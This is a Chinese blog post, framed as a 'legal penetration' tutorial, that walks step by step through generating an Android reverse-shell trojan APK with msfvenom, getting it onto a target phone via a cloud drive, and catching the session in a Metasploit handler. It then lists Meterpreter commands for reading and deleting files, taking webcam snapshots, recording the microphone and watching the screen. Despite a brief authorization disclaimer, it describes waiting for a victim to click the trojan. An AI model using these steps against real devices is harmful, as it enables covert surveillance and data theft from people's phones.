合法渗透黑客教学(摄像头*手机各种信息统统搞定)(简略说一下 后续会更新小白教程)

User001发布

作者 阿坤

声明:操作虽在公网进行 但已获得他人授权 不得非法入侵他人设备 遵纪守法 若进行非法行为以及非法操作 与本人教学无关
前期准备 1.装有kali Linux的虚拟机 这里使用VMware进行教学2. 一台安卓手机
注意:以下命令均为root用户执行 默认登入账号密码为kali用户进入后使用sudo命令即可
root账户账号密码
账号:root

账号:kali

1.配置网络 在装有kali Linux的虚拟机设置中 将硬件中的网络连接模式改成桥接模式 NAT模式测试经常报错
2.设备连接状态在网络适配器中调入 复制物理网络连接状态 [PS: 一定记得保存]
3.查看本机ip 命令为 ifconfig 区别于win操作系统为ipconfig 一定记住
ip在eth0 第二行inet 后面 切记不要搞错 否则后续操作均无效
4.我们需要先生成一个带有木马的安卓软件 在root用户下 输入以下命令:
代码规范:
{msfvenom -p android/meterpreter/reverse_tcp LHOST=刚刚获取到的本机ip LPORT=你要监听端口的名称 R > /放置的目录/文件名.apk}
代码示例:
{msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.51.2 LPORT=8848 R > /root/101/shell.apk}
输入后会在你输入的目录中生成一个apk安装包 将其安装到你要渗透的手机上 并且记住你输入的监听端口 有些手机系统下载后找不到安装包
懒人直接将其放入云盘 手机下载后默认安装包执行
安装时软件应用名为MainActivtiy
5.输入msfconsole 在2022.2版本时为msf6 不是错误 等待执行完毕后 在msf6条件下输入以下执行代码
代码示例:
{use exploit/multi/handler}
系统输出: Using configured payload generic/shell_reverse_tcp
6.再次输出以下代码:
代码示例:
{set payload android/meterpreter/reverse_tcp}
系统输出:payload => android/meterpreter/reverse_tcp
7.再次输出以下代码:
代码规范:
{set LHOST 刚刚获取到的本机IP}
代码示例:
{set LHOST 192.168.51.2}
系统输出:LHOST => 192.168.51.2
8.再次输出以下代码:
代码规范:
{set LPORT 监听端口的名称}
代码示例:
{set LPORT 8848}
系统输出:LPORT => 8848
9.最后输入以下代码
代码示例:{exploit}
系统输出:Started reverse TCP handler on 192.168.51.2:8848
10.此时此刻出现以上系统输出语句代表执行成功 慢慢等待那个有缘人点击我们的木马软件
执行后会出现以下语句
[] Started reverse TCP handler on 192.168.51.2:8848 [] Sending stage (78144 bytes) to 192.168.51.9
[*] Meterpreter session 1 opened (192.168.51.2:8848 -> 192.168.51.9:63582 ) at 2022-05-25 07:38:23 -04003253482599
11.此时此刻对话栏出现meterpreter >
即代表成功
注入msf命令即可

我们可以输入以下命令 对目标手机进行执行操作

1.bg 背景别名
2.bgkill 杀死一个后台meterpreter脚本
3.bglist 列出正在运行的后台脚本
4.bgrun 作为后台线程执行一个meterpreter脚本
5.detach 分离meterpreter会话(对于http/https)
6.disable_unicode_encoding 禁用 unicode 字符串的编码
7.enable_unicode_encoding 启用 unicode 字符串的编码
8.exit 终止meterpreter会话
9.get_timeouts 获取当前会话超时值
10.guid 获取会话 GUID
11.info 显示有关 Post 模块的信息
12.irb 在当前会话中打开一个交互式 Ruby shell
13.load 加载一个或多个meterpreter扩展
14.machine_id 获取附加到会话的机器的 MSF ID
15.pry 在当前会话上打开 Pry 调试器
16.run 执行一个 Meterpreter 脚本或 Post 模块
17.set_timeouts 设置当前会话超时值
18.sleep 强制 Meterpreter 安静,然后重新建立会话
19.transport 管理传输机制
21.uuid 获取当前会话的 UUID
22.write 将数据写入通道
23.cat 读取文件内容到屏幕
24.cd 更改目录
25.checksum 检索文件的校验和
26.cp 将源复制到目标
27.del 删除指定文件
28.dir 列出文件(ls 的别名)
29.getlwd 打印本地工作目录
30.getwd 打印工作目录
31.lcat 读取本地文件内容到屏幕
32.lcd 更改本地工作目录
33.ls 列出本地文件
34.pwd 打印本地工作目录
35.ls 列出文件
36.mkdir 创建目录
37.mv 将源移动到目标
38.pwd 打印工作目录
39.rm 删除指定文件
40.rmdir 删除目录
41.use sniffer加载嗅探模式
42.sessions -K杀死所有活跃的交互会话
43.ifconfig 显示界面
44.ipconfig 显示界面
45.portfwd 将本地端口转发到远程服务
46.route 查看和修改路由表
47.getenv 获取一个或多个环境变量值
48.getpid 获取当前进程标识符
49.getuid 获取服务器运行的用户
50.localtime 显示目标系统的本地日期和时间
51.pgrep 按名称过滤进程
52.ps 列出正在运行的进程
53.shell 放入系统命令 shell
54.sysinfo 获取远程系统的信息,例如操作系统
55.screenshare 实时观看远程用户桌面
56.screenshot 抓取交互式桌面的屏幕截图
57.record_mic 从默认麦克风录制音频 X 秒
58.webcam_chat 开始视频聊天
59.webcam_list 列出网络摄像头
60.webcam_snap 从指定的网络摄像头拍摄快照


0 条评论

发表回复

Avatar placeholder

您的电子邮箱地址不会被公开。

< a href="https://beian.miit.gov.cn/" target="_blank">辽ICP备2021012786号